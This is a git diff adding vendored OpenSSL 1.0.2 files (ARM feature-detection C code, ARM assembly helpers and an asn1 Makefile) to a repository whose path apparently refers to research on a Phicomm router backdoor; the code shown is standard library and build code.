+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/arm_arch.h
@@ -0,0 +1,78 @@
+#ifndef __ARM_ARCH_H__
+# define __ARM_ARCH_H__
+
+# if !defined(__ARM_ARCH__)
+#  if defined(__CC_ARM)
+#   define __ARM_ARCH__ __TARGET_ARCH_ARM
+#   if defined(__BIG_ENDIAN)
+#    define __ARMEB__
+#   else
+#    define __ARMEL__
+#   endif
+#  elif defined(__GNUC__)
+#   if   defined(__aarch64__)
+#    define __ARM_ARCH__ 8
+#    if __BYTE_ORDER__==__ORDER_BIG_ENDIAN__
+#     define __ARMEB__
+#    else
+#     define __ARMEL__
+#    endif
+  /*
+   * Why doesn't gcc define __ARM_ARCH__? Instead it defines
+   * bunch of below macros. See all_architectires[] table in
+   * gcc/config/arm/arm.c. On a side note it defines
+   * __ARMEL__/__ARMEB__ for little-/big-endian.
+   */
+#   elif defined(__ARM_ARCH)
+#    define __ARM_ARCH__ __ARM_ARCH
+#   elif defined(__ARM_ARCH_8A__)
+#    define __ARM_ARCH__ 8
+#   elif defined(__ARM_ARCH_7__) || defined(__ARM_ARCH_7A__)     || \
+        defined(__ARM_ARCH_7R__)|| defined(__ARM_ARCH_7M__)     || \
+        defined(__ARM_ARCH_7EM__)
+#    define __ARM_ARCH__ 7
+#   elif defined(__ARM_ARCH_6__) || defined(__ARM_ARCH_6J__)     || \
+        defined(__ARM_ARCH_6K__)|| defined(__ARM_ARCH_6M__)     || \
+        defined(__ARM_ARCH_6Z__)|| defined(__ARM_ARCH_6ZK__)    || \
+        defined(__ARM_ARCH_6T2__)
+#    define __ARM_ARCH__ 6
+#   elif defined(__ARM_ARCH_5__) || defined(__ARM_ARCH_5T__)     || \
+        defined(__ARM_ARCH_5E__)|| defined(__ARM_ARCH_5TE__)    || \
+        defined(__ARM_ARCH_5TEJ__)
+#    define __ARM_ARCH__ 5
+#   elif defined(__ARM_ARCH_4__) || defined(__ARM_ARCH_4T__)
+#    define __ARM_ARCH__ 4
+#   else
+#    error "unsupported ARM architecture"
+#   endif
+#  endif
+# endif
+
+# ifdef OPENSSL_FIPSCANISTER
+#  include <openssl/fipssyms.h>
+# endif
+
+# if !defined(__ARM_MAX_ARCH__)
+#  define __ARM_MAX_ARCH__ __ARM_ARCH__
+# endif
+
+# if __ARM_MAX_ARCH__<__ARM_ARCH__
+#  error "__ARM_MAX_ARCH__ can't be less than __ARM_ARCH__"
+# elif __ARM_MAX_ARCH__!=__ARM_ARCH__
+#  if __ARM_ARCH__<7 && __ARM_MAX_ARCH__>=7 && defined(__ARMEB__)
+#   error "can't build universal big-endian binary"
+#  endif
+# endif
+
+# if !__ASSEMBLER__
+extern unsigned int OPENSSL_armcap_P;
+# endif
+
+# define ARMV7_NEON      (1<<0)
+# define ARMV7_TICK      (1<<1)
+# define ARMV8_AES       (1<<2)
+# define ARMV8_SHA1      (1<<3)
+# define ARMV8_SHA256    (1<<4)
+# define ARMV8_PMULL     (1<<5)
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/armcap.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/armcap.c
new file mode 100644
index 0000000..356fa15
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/armcap.c
@@ -0,0 +1,164 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <setjmp.h>
+#include <signal.h>
+#include <crypto.h>
+
+#include "arm_arch.h"
+
+unsigned int OPENSSL_armcap_P = 0;
+
+#if __ARM_MAX_ARCH__<7
+void OPENSSL_cpuid_setup(void)
+{
+}
+
+unsigned long OPENSSL_rdtsc(void)
+{
+    return 0;
+}
+#else
+static sigset_t all_masked;
+
+static sigjmp_buf ill_jmp;
+static void ill_handler(int sig)
+{
+    siglongjmp(ill_jmp, sig);
+}
+
+/*
+ * Following subroutines could have been inlined, but it's not all
+ * ARM compilers support inline assembler...
+ */
+void _armv7_neon_probe(void);
+void _armv8_aes_probe(void);
+void _armv8_sha1_probe(void);
+void _armv8_sha256_probe(void);
+void _armv8_pmull_probe(void);
+unsigned long _armv7_tick(void);
+
+unsigned long OPENSSL_rdtsc(void)
+{
+    if (OPENSSL_armcap_P & ARMV7_TICK)
+        return _armv7_tick();
+    else
+        return 0;
+}
+
+/*
+ * Use a weak reference to getauxval() so we can use it if it is available but
+ * don't break the build if it is not.
+ */
+# if defined(__GNUC__) && __GNUC__>=2
+void OPENSSL_cpuid_setup(void) __attribute__ ((constructor));
+extern unsigned long getauxval(unsigned long type) __attribute__ ((weak));
+# else
+static unsigned long (*getauxval) (unsigned long) = NULL;
+# endif
+
+/*
+ * ARM puts the the feature bits for Crypto Extensions in AT_HWCAP2, whereas
+ * AArch64 used AT_HWCAP.
+ */
+# if defined(__arm__) || defined (__arm)
+#  define HWCAP                  16
+                                  /* AT_HWCAP */
+#  define HWCAP_NEON             (1 << 12)
+
+#  define HWCAP_CE               26
+                                  /* AT_HWCAP2 */
+#  define HWCAP_CE_AES           (1 << 0)
+#  define HWCAP_CE_PMULL         (1 << 1)
+#  define HWCAP_CE_SHA1          (1 << 2)
+#  define HWCAP_CE_SHA256        (1 << 3)
+# elif defined(__aarch64__)
+#  define HWCAP                  16
+                                  /* AT_HWCAP */
+#  define HWCAP_NEON             (1 << 1)
+
+#  define HWCAP_CE               HWCAP
+#  define HWCAP_CE_AES           (1 << 3)
+#  define HWCAP_CE_PMULL         (1 << 4)
+#  define HWCAP_CE_SHA1          (1 << 5)
+#  define HWCAP_CE_SHA256        (1 << 6)
+# endif
+
+void OPENSSL_cpuid_setup(void)
+{
+    char *e;
+    struct sigaction ill_oact, ill_act;
+    sigset_t oset;
+    static int trigger = 0;
+
+    if (trigger)
+        return;
+    trigger = 1;
+
+    if ((e = getenv("OPENSSL_armcap"))) {
+        OPENSSL_armcap_P = (unsigned int)strtoul(e, NULL, 0);
+        return;
+    }
+
+    sigfillset(&all_masked);
+    sigdelset(&all_masked, SIGILL);
+    sigdelset(&all_masked, SIGTRAP);
+    sigdelset(&all_masked, SIGFPE);
+    sigdelset(&all_masked, SIGBUS);
+    sigdelset(&all_masked, SIGSEGV);
+
+    OPENSSL_armcap_P = 0;
+
+    memset(&ill_act, 0, sizeof(ill_act));
+    ill_act.sa_handler = ill_handler;
+    ill_act.sa_mask = all_masked;
+
+    sigprocmask(SIG_SETMASK, &ill_act.sa_mask, &oset);
+    sigaction(SIGILL, &ill_act, &ill_oact);
+
+    if (getauxval != NULL) {
+        if (getauxval(HWCAP) & HWCAP_NEON) {
+            unsigned long hwcap = getauxval(HWCAP_CE);
+
+            OPENSSL_armcap_P |= ARMV7_NEON;
+
+            if (hwcap & HWCAP_CE_AES)
+                OPENSSL_armcap_P |= ARMV8_AES;
+
+            if (hwcap & HWCAP_CE_PMULL)
+                OPENSSL_armcap_P |= ARMV8_PMULL;
+
+            if (hwcap & HWCAP_CE_SHA1)
+                OPENSSL_armcap_P |= ARMV8_SHA1;
+
+            if (hwcap & HWCAP_CE_SHA256)
+                OPENSSL_armcap_P |= ARMV8_SHA256;
+        }
+    } else if (sigsetjmp(ill_jmp, 1) == 0) {
+        _armv7_neon_probe();
+        OPENSSL_armcap_P |= ARMV7_NEON;
+        if (sigsetjmp(ill_jmp, 1) == 0) {
+            _armv8_pmull_probe();
+            OPENSSL_armcap_P |= ARMV8_PMULL | ARMV8_AES;
+        } else if (sigsetjmp(ill_jmp, 1) == 0) {
+            _armv8_aes_probe();
+            OPENSSL_armcap_P |= ARMV8_AES;
+        }
+        if (sigsetjmp(ill_jmp, 1) == 0) {
+            _armv8_sha1_probe();
+            OPENSSL_armcap_P |= ARMV8_SHA1;
+        }
+        if (sigsetjmp(ill_jmp, 1) == 0) {
+            _armv8_sha256_probe();
+            OPENSSL_armcap_P |= ARMV8_SHA256;
+        }
+    }
+    if (sigsetjmp(ill_jmp, 1) == 0) {
+        _armv7_tick();
+        OPENSSL_armcap_P |= ARMV7_TICK;
+    }
+
+    sigaction(SIGILL, &ill_oact, NULL);
+    sigprocmask(SIG_SETMASK, &oset, NULL);
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/armv4cpuid.S b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/armv4cpuid.S
new file mode 100644
index 0000000..65010ae
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/armv4cpuid.S
@@ -0,0 +1,209 @@
+#include "arm_arch.h"
+
+.text
+.code	32
+
+.align	5
+.global	OPENSSL_atomic_add
+.type	OPENSSL_atomic_add,%function
+OPENSSL_atomic_add:
+#if __ARM_ARCH__>=6
+.Ladd:	ldrex	r2,[r0]
+	add	r3,r2,r1
+	strex	r2,r3,[r0]
+	cmp	r2,#0
+	bne	.Ladd
+	mov	r0,r3
+	bx	lr
+#else
+	stmdb	sp!,{r4-r6,lr}
+	ldr	r2,.Lspinlock
+	adr	r3,.Lspinlock
+	mov	r4,r0
+	mov	r5,r1
+	add	r6,r3,r2	@ &spinlock
+	b	.+8
+.Lspin:	bl	sched_yield
+	mov	r0,#-1
+	swp	r0,r0,[r6]
+	cmp	r0,#0
+	bne	.Lspin
+
+	ldr	r2,[r4]
+	add	r2,r2,r5
+	str	r2,[r4]
+	str	r0,[r6]		@ release spinlock
+	ldmia	sp!,{r4-r6,lr}
+	tst	lr,#1
+	moveq	pc,lr
+	.word	0xe12fff1e	@ bx	lr
+#endif
+.size	OPENSSL_atomic_add,.-OPENSSL_atomic_add
+
+.global	OPENSSL_cleanse
+.type	OPENSSL_cleanse,%function
+OPENSSL_cleanse:
+	eor	ip,ip,ip
+	cmp	r1,#7
+	subhs	r1,r1,#4
+	bhs	.Lot
+	cmp	r1,#0
+	beq	.Lcleanse_done
+.Little:
+	strb	ip,[r0],#1
+	subs	r1,r1,#1
+	bhi	.Little
+	b	.Lcleanse_done
+
+.Lot:	tst	r0,#3
+	beq	.Laligned
+	strb	ip,[r0],#1
+	sub	r1,r1,#1
+	b	.Lot
+.Laligned:
+	str	ip,[r0],#4
+	subs	r1,r1,#4
+	bhs	.Laligned
+	adds	r1,r1,#4
+	bne	.Little
+.Lcleanse_done:
+#if __ARM_ARCH__>=5
+	bx	lr
+#else
+	tst	lr,#1
+	moveq	pc,lr
+	.word	0xe12fff1e	@ bx	lr
+#endif
+.size	OPENSSL_cleanse,.-OPENSSL_cleanse
+
+#if __ARM_MAX_ARCH__>=7
+.arch	armv7-a
+.fpu	neon
+
+.align	5
+.global	_armv7_neon_probe
+.type	_armv7_neon_probe,%function
+_armv7_neon_probe:
+	vorr	q0,q0,q0
+	bx	lr
+.size	_armv7_neon_probe,.-_armv7_neon_probe
+
+.global	_armv7_tick
+.type	_armv7_tick,%function
+_armv7_tick:
+	mrrc	p15,1,r0,r1,c14		@ CNTVCT
+	bx	lr
+.size	_armv7_tick,.-_armv7_tick
+
+.global	_armv8_aes_probe
+.type	_armv8_aes_probe,%function
+_armv8_aes_probe:
+	.byte	0x00,0x03,0xb0,0xf3	@ aese.8	q0,q0
+	bx	lr
+.size	_armv8_aes_probe,.-_armv8_aes_probe
+
+.global	_armv8_sha1_probe
+.type	_armv8_sha1_probe,%function
+_armv8_sha1_probe:
+	.byte	0x40,0x0c,0x00,0xf2	@ sha1c.32	q0,q0,q0
+	bx	lr
+.size	_armv8_sha1_probe,.-_armv8_sha1_probe
+
+.global	_armv8_sha256_probe
+.type	_armv8_sha256_probe,%function
+_armv8_sha256_probe:
+	.byte	0x40,0x0c,0x00,0xf3	@ sha256h.32	q0,q0,q0
+	bx	lr
+.size	_armv8_sha256_probe,.-_armv8_sha256_probe
+.global	_armv8_pmull_probe
+.type	_armv8_pmull_probe,%function
+_armv8_pmull_probe:
+	.byte	0x00,0x0e,0xa0,0xf2	@ vmull.p64	q0,d0,d0
+	bx	lr
+.size	_armv8_pmull_probe,.-_armv8_pmull_probe
+#endif
+
+.global	OPENSSL_wipe_cpu
+.type	OPENSSL_wipe_cpu,%function
+OPENSSL_wipe_cpu:
+#if __ARM_MAX_ARCH__>=7
+	ldr	r0,.LOPENSSL_armcap
+	adr	r1,.LOPENSSL_armcap
+	ldr	r0,[r1,r0]
+#endif
+	eor	r2,r2,r2
+	eor	r3,r3,r3
+	eor	ip,ip,ip
+#if __ARM_MAX_ARCH__>=7
+	tst	r0,#1
+	beq	.Lwipe_done
+	veor	q0, q0, q0
+	veor	q1, q1, q1
+	veor	q2, q2, q2
+	veor	q3, q3, q3
+	veor	q8, q8, q8
+	veor	q9, q9, q9
+	veor	q10, q10, q10
+	veor	q11, q11, q11
+	veor	q12, q12, q12
+	veor	q13, q13, q13
+	veor	q14, q14, q14
+	veor	q15, q15, q15
+.Lwipe_done:
+#endif
+	mov	r0,sp
+#if __ARM_ARCH__>=5
+	bx	lr
+#else
+	tst	lr,#1
+	moveq	pc,lr
+	.word	0xe12fff1e	@ bx	lr
+#endif
+.size	OPENSSL_wipe_cpu,.-OPENSSL_wipe_cpu
+
+.global	OPENSSL_instrument_bus
+.type	OPENSSL_instrument_bus,%function
+OPENSSL_instrument_bus:
+	eor	r0,r0,r0
+#if __ARM_ARCH__>=5
+	bx	lr
+#else
+	tst	lr,#1
+	moveq	pc,lr
+	.word	0xe12fff1e	@ bx	lr
+#endif
+.size	OPENSSL_instrument_bus,.-OPENSSL_instrument_bus
+
+.global	OPENSSL_instrument_bus2
+.type	OPENSSL_instrument_bus2,%function
+OPENSSL_instrument_bus2:
+	eor	r0,r0,r0
+#if __ARM_ARCH__>=5
+	bx	lr
+#else
+	tst	lr,#1
+	moveq	pc,lr
+	.word	0xe12fff1e	@ bx	lr
+#endif
+.size	OPENSSL_instrument_bus2,.-OPENSSL_instrument_bus2
+
+.align	5
+#if __ARM_MAX_ARCH__>=7
+.LOPENSSL_armcap:
+.word	OPENSSL_armcap_P-.LOPENSSL_armcap
+#endif
+#if __ARM_ARCH__>=6
+.align	5
+#else
+.Lspinlock:
+.word	atomic_add_spinlock-.Lspinlock
+.align	5
+
+.data
+.align	2
+atomic_add_spinlock:
+.word	0
+#endif
+
+.comm	OPENSSL_armcap_P,4,4
+.hidden	OPENSSL_armcap_P
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/Makefile
new file mode 100644
index 0000000..7b26324
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/Makefile
@@ -0,0 +1,876 @@
+#
+# OpenSSL/crypto/asn1/Makefile
+#
+
+DIR=	asn1
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile README
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=	a_object.c a_bitstr.c a_utctm.c a_gentm.c a_time.c a_int.c a_octet.c \
+	a_print.c a_type.c a_set.c a_dup.c a_d2i_fp.c a_i2d_fp.c \
+	a_enum.c a_utf8.c a_sign.c a_digest.c a_verify.c a_mbstr.c a_strex.c \
+	x_algor.c x_val.c x_pubkey.c x_sig.c x_req.c x_attrib.c x_bignum.c \
+	x_long.c x_name.c x_x509.c x_x509a.c x_crl.c x_info.c x_spki.c nsseq.c \
+	x_nx509.c d2i_pu.c d2i_pr.c i2d_pu.c i2d_pr.c\
+	t_req.c t_x509.c t_x509a.c t_crl.c t_pkey.c t_spki.c t_bitst.c \
+	tasn_new.c tasn_fre.c tasn_enc.c tasn_dec.c tasn_utl.c tasn_typ.c \
+	tasn_prn.c ameth_lib.c \
+	f_int.c f_string.c n_pkey.c \
+	f_enum.c x_pkey.c a_bool.c x_exten.c bio_asn1.c bio_ndef.c asn_mime.c \
+	asn1_gen.c asn1_par.c asn1_lib.c asn1_err.c a_bytes.c a_strnid.c \
+	evp_asn1.c asn_pack.c p5_pbe.c p5_pbev2.c p8_pkey.c asn_moid.c
+LIBOBJ= a_object.o a_bitstr.o a_utctm.o a_gentm.o a_time.o a_int.o a_octet.o \
+	a_print.o a_type.o a_set.o a_dup.o a_d2i_fp.o a_i2d_fp.o \
+	a_enum.o a_utf8.o a_sign.o a_digest.o a_verify.o a_mbstr.o a_strex.o \
+	x_algor.o x_val.o x_pubkey.o x_sig.o x_req.o x_attrib.o x_bignum.o \
+	x_long.o x_name.o x_x509.o x_x509a.o x_crl.o x_info.o x_spki.o nsseq.o \
+	x_nx509.o d2i_pu.o d2i_pr.o i2d_pu.o i2d_pr.o \
+	t_req.o t_x509.o t_x509a.o t_crl.o t_pkey.o t_spki.o t_bitst.o \
+	tasn_new.o tasn_fre.o tasn_enc.o tasn_dec.o tasn_utl.o tasn_typ.o \
+	tasn_prn.o ameth_lib.o \
+	f_int.o f_string.o n_pkey.o \
+	f_enum.o x_pkey.o a_bool.o x_exten.o bio_asn1.o bio_ndef.o asn_mime.o \
+	asn1_gen.o asn1_par.o asn1_lib.o asn1_err.o a_bytes.o a_strnid.o \
+	evp_asn1.o asn_pack.o p5_pbe.o p5_pbev2.o p8_pkey.o asn_moid.o
+
+SRC= $(LIBSRC)
+
+EXHEADER=  asn1.h asn1_mac.h asn1t.h
+HEADER=	$(EXHEADER) asn1_locl.h
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+test:	test.c
+	cc -g -I../../include -c test.c
+	cc -g -I../../include -o test test.o -L../.. -lcrypto
+
+pk:	pk.c
+	cc -g -I../../include -c pk.c
+	cc -g -I../../include -o pk pk.o -L../.. -lcrypto
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by top Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+a_bitstr.o: ../../e_os.h ../../include/openssl/asn1.h
+a_bitstr.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+a_bitstr.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+a_bitstr.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+a_bitstr.o: ../../include/openssl/opensslconf.h
+a_bitstr.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+a_bitstr.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+a_bitstr.o: ../../include/openssl/symhacks.h ../cryptlib.h a_bitstr.c
+a_bool.o: ../../e_os.h ../../include/openssl/asn1.h
+a_bool.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+a_bool.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+a_bool.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+a_bool.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+a_bool.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+a_bool.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+a_bool.o: ../../include/openssl/symhacks.h ../cryptlib.h a_bool.c
+a_bytes.o: ../../e_os.h ../../include/openssl/asn1.h
+a_bytes.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+a_bytes.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+a_bytes.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+a_bytes.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+a_bytes.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+a_bytes.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+a_bytes.o: ../cryptlib.h a_bytes.c
+a_d2i_fp.o: ../../e_os.h ../../include/openssl/asn1.h
+a_d2i_fp.o: ../../include/openssl/asn1_mac.h ../../include/openssl/bio.h
+a_d2i_fp.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+a_d2i_fp.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+a_d2i_fp.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+a_d2i_fp.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+a_d2i_fp.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+a_d2i_fp.o: ../../include/openssl/symhacks.h ../cryptlib.h a_d2i_fp.c
+a_digest.o: ../../e_os.h ../../include/openssl/asn1.h
+a_digest.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+a_digest.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+a_digest.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+a_digest.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+a_digest.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+a_digest.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+a_digest.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+a_digest.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+a_digest.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+a_digest.o: ../../include/openssl/x509_vfy.h ../cryptlib.h a_digest.c
+a_dup.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+a_dup.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+a_dup.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+a_dup.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+a_dup.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+a_dup.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+a_dup.o: ../../include/openssl/symhacks.h ../cryptlib.h a_dup.c
+a_enum.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+a_enum.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+a_enum.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+a_enum.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+a_enum.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+a_enum.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+a_enum.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+a_enum.o: ../cryptlib.h a_enum.c
+a_gentm.o: ../../e_os.h ../../include/openssl/asn1.h
+a_gentm.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+a_gentm.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+a_gentm.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+a_gentm.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+a_gentm.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+a_gentm.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+a_gentm.o: ../cryptlib.h ../o_time.h a_gentm.c asn1_locl.h
+a_i2d_fp.o: ../../e_os.h ../../include/openssl/asn1.h
+a_i2d_fp.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+a_i2d_fp.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+a_i2d_fp.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+a_i2d_fp.o: ../../include/openssl/opensslconf.h
+a_i2d_fp.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+a_i2d_fp.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+a_i2d_fp.o: ../../include/openssl/symhacks.h ../cryptlib.h a_i2d_fp.c
+a_int.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+a_int.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+a_int.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+a_int.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+a_int.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+a_int.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+a_int.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+a_int.o: ../cryptlib.h a_int.c
+a_mbstr.o: ../../e_os.h ../../include/openssl/asn1.h
+a_mbstr.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+a_mbstr.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+a_mbstr.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+a_mbstr.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+a_mbstr.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+a_mbstr.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+a_mbstr.o: ../cryptlib.h a_mbstr.c
+a_object.o: ../../e_os.h ../../include/openssl/asn1.h
+a_object.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+a_object.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+a_object.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+a_object.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+a_object.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+a_object.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+a_object.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+a_object.o: ../../include/openssl/symhacks.h ../cryptlib.h a_object.c
+a_octet.o: ../../e_os.h ../../include/openssl/asn1.h
+a_octet.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+a_octet.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+a_octet.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+a_octet.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+a_octet.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+a_octet.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+a_octet.o: ../cryptlib.h a_octet.c
+a_print.o: ../../e_os.h ../../include/openssl/asn1.h
+a_print.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+a_print.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+a_print.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+a_print.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+a_print.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+a_print.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+a_print.o: ../cryptlib.h a_print.c
+a_set.o: ../../e_os.h ../../include/openssl/asn1.h
+a_set.o: ../../include/openssl/asn1_mac.h ../../include/openssl/bio.h
+a_set.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+a_set.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+a_set.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+a_set.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+a_set.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+a_set.o: ../../include/openssl/symhacks.h ../cryptlib.h a_set.c
+a_sign.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+a_sign.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+a_sign.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+a_sign.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+a_sign.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+a_sign.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+a_sign.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+a_sign.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+a_sign.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+a_sign.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+a_sign.o: ../../include/openssl/x509_vfy.h ../cryptlib.h a_sign.c asn1_locl.h
+a_strex.o: ../../e_os.h ../../include/openssl/asn1.h
+a_strex.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+a_strex.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+a_strex.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+a_strex.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
